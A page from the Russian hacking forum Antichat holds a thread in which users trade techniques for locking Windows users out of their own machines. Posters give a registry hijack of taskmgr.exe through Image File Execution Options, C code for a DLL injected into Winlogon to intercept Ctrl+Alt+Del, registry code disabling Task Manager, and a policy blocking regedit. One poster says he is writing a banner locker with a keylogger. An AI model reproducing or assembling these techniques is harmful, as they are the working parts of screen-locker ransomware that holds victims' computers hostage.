HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Перезагрузить страницу Блочим Диспетчер Задач в Windows NT[Ваши предложения]
   
Ответ
Страница 4 из 4 < 1 2 3 4
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.04.2010, 14:54
cheater_man
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
С нами: 8680278

Репутация: 17
По умолчанию
Цитата:
а как включи, а то заблочили?
Удали эту ветку из реестра.
Цитата:
Сообщение от slesh  
2 cheater_man а ты попробуй снчало открыть этот ключ, а потом сам поймешь

Вот reg файл для примера:
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="\"C:\\WINDOWS\\MYPROG.EXE\""
Ага примерчик так ниче
Прописал
Код:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="\"C:\\WINDOWS\\SYSTEM32\\cmd.exe\""
[/QUOTE]
Запускается cmd, но с именем taskmng.exe
По идее если заблочить диспетчер, то уже от него необязательно скрывать процесс?
И приведи нормальный пример скрытия екзешника от диспетчера, только не тот пример который из DelphiWorld
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 05.04.2010, 14:29
Life7
Banned
Регистрация: 14.06.2009
Сообщений: 256
С нами: 8899013

Репутация: 105
По умолчанию
а как включи, а то заблочили?
 
Ответить с цитированием

  #3  
Старый 05.04.2010, 15:45
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
С нами: 8686406

Репутация: 265


По умолчанию
cheater_man блокиратор пишеш?
не забудь отключить остальные клавиши закрытия программы.
 
Ответить с цитированием

  #4  
Старый 05.04.2010, 16:25
cheater_man
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
С нами: 8680278

Репутация: 17
По умолчанию
Цитата:
Сообщение от stepashka_  
cheater_man блокиратор пишеш?
не забудь отключить остальные клавиши закрытия программы.
Я хз че пишу Что в голову приходит Банер + блокератор + кейлогер + еще что нибудь пока незнаю За одно вспомнить бейсиковский синтаксис, то наверное уже лет десять его невидел (пишу на PureBasic)
Если надо потом когда допишу могу сорс выложить
Последний раз редактировалось cheater_man; 05.04.2010 в 16:29..
 
Ответить с цитированием

  #5  
Старый 05.04.2010, 17:15
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
С нами: 10943066

Репутация: 1236


По умолчанию
Код:
Немного теории

Процесс Winlogon при загрузке создает окно "SAS window", которое регистрирует HOTKEY для Ctrl+Alt+Del (CAD) и Ctrl+Shift+Esc (CSE). Вот собственно и все.

Перехват

Для перехвата CAD (CSE) нам необходимо внедрить DLL в процесс Winlogon, сабклассить указанное окно, и обрабатывать сообщение WM_HOTKEY:


// Новая оконная функция
LRESULT WINAPI NewSASProc( HWND hSAS, UINT msg, WPARAM wParam, LPARAM lParam )
{
    if( WM_HOTKEY == msg ){
         // Поймали HOTKEY CAD (CSE) - выводим сообщение на десктоп "Default" и затем выходим
         if( MAKELONG( MOD_CONTROL | MOD_ALT, VK_DELETE ) == lParam ){
              MessageBoxEx( GetActiveWindow(), TEXT("Ctrl + Alt + Del"), 
                                               TEXT("SAS Hook"), MB_DEFAULT_DESKTOP_ONLY, 0 );
              return 0;
             }

         if( MAKELONG( MOD_CONTROL | MOD_SHIFT, VK_ESCAPE ) == lParam ){
              MessageBoxEx( GetActiveWindow(), TEXT("Ctrl + Shift + Esc"), 
                                               TEXT("SAS Hook"), MB_DEFAULT_DESKTOP_ONLY, 0 );
              return 0;
             }
        }

    // Вызываем стандартный обработчик
    return CallWindowProc( g_OldSASProc, hSAS, msg, wParam, lParam );
}
Функция DllMain:

BOOL WINAPI DllMain( HINSTANCE hinstDll, DWORD fdwReason, PVOID fImpLoad )
{
    if( DLL_PROCESS_ATTACH == fdwReason ){
         // Находим окно
         g_hSASwnd = FindWindow( TEXT("SAS Window class"), TEXT("SAS window") );

         // Заменяем обработчик
         if( g_hSASwnd != NULL )
              g_OldSASProc = (WNDPROC) SetWindowLong( g_hSASwnd, GWL_WNDPROC, (LONG) NewSASProc );
        }

    if( DLL_PROCESS_DETACH == fdwReason ){
         // Возвращаем обработчик
         if( g_hSASwnd != NULL )
              SetWindowLong( g_hSASwnd, GWL_WNDPROC, (LONG) g_OldSASProc );
        }

    return TRUE;
}
=) мб уже не актуально - не проверял
__________________


snow white world wide
 
Ответить с цитированием

  #6  
Старый 05.04.2010, 17:22
cheater_man
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
С нами: 8680278

Репутация: 17
По умолчанию
Да это уж слишком жестокий хук будет, ну если конечно рабочий
 
Ответить с цитированием

  #7  
Старый 07.04.2010, 00:36
Arcen
Banned
Регистрация: 29.03.2010
Сообщений: 15
С нами: 8484455

Репутация: 2
По умолчанию
сделать пиу пиу в реестре и делов-то:
Код:
CreateNewKey HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies\System"
SetKeyValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "1", REG_DWORD
вб 6.0
археологи...
и вобще, хватит жрать мой хлеб, пишите спамеры
 
Ответить с цитированием

  #8  
Старый 07.04.2010, 04:23
M_script_
Постоянный
Регистрация: 29.10.2008
Сообщений: 306
С нами: 9227388

Репутация: 180
По умолчанию
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
"DisallowRun" = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\DisallowRun\
"regedit.exe" = ""
 
Ответить с цитированием
Ответ
Страница 4 из 4 < 1 2 3 4



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
История Windows (с картинками) GrinGoO Статьи 31 06.09.2010 03:19
Секреты Windows 7 Campery Статьи 17 19.11.2009 02:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.